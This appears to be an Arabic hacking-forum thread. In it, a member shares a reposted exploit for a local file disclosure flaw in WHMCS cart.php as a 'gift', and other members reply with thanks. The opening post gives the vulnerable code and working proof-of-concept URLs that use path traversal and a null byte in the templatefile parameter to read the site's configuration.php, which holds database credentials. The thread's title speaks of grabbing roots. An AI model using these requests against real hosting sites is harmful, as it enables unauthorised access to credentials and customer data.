حالة الموضوع:
مغلق
  1. الهكر الاقرع HR

    الهكر الاقرع HR Developer

    الأنتساب:
    ‏18 ديسمبر 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]
    السلام عليكم ورحمة الله

    اليوم ثغرة حلوة هدية

    بدون اطالة في الكلام


    رابط الثغرة


    [INFO]WHMCompleteSolution (cart.php) Local File Disclosure[/INFO]

    الثغره


    كود PHP:
    # Title      : WHMCompleteSolution (cart.php) Local File Disclosure
    # Author     : Lagripe-Dz
    # Product    : WHMCS ( WHMCompleteSolution )
    # Vendor     : http://whmcs.com/
    # Date       : 10/01/2011
    # Version    : 3.x.x , 4.0.x
    # Tested on  : linux+apache
     
    ================================================================
     
    Vuln filecart.php
    ---------
     
    Vuln code:
    ---------
     
    if ( 
    $a == "add" )
    {
       
    $templatefile "configureproductdomain";
        ....
    etc
    }
     
    if ( 
    $a == "login" )
    {
        
    $templatefile "login";
        ....
    etc
    }
     ...
    outputClientArea$templatefile$nowrapper );
    # outputClientArea function will display
    "./templates/orderforms/cart/{$templatefile}.tpl"
     
     
    Details :
    ---------
     
    if 
    variable "$ahas a true value .. will set "$templatefilevalue by
    default
    but when "$avalue didn't match the defaults values
    you can control "$templatefile" and use it as ( File Disclosure )
     
     
    Proof of Concept :
    ------------------
     
    http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00
     
    http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00
     
     
    note* : show the page source to see Disclosure file.
     
    Solution :
    ----------
     
    the vendor Notificate
    update to the last version
     
    ================================================================


     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ś‡òÞ Ħąć

    ś‡òÞ Ħąć Developer

    الأنتساب:
    ‏20 مارس 2013
    المشاركات:
    64
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافيه اخوي
     
  4. الحوت الأزرق

    الحوت الأزرق Developer

    الأنتساب:
    ‏20 نوفمبر 2012
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك العافيه
     
  5. hacker.cydia

    hacker.cydia Developer

    الأنتساب:
    ‏4 يونيو 2013
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    pc
    الإقامة:
    Anonymous
    رد: ثغره من نوع برايفت اسحب روتات

    thnxx .... &:":
     
  6. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: ثغره من نوع برايفت اسحب روتات

    %:"
     
  7. Mstr Yaser

    Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    1
    رد: ثغره من نوع برايفت اسحب روتات

    يعطيك الف عافية تسلم ع الطرح ال اكثر من رائع
     
  8. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: ثغره من نوع برايفت اسحب روتات

    {1!$8}
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة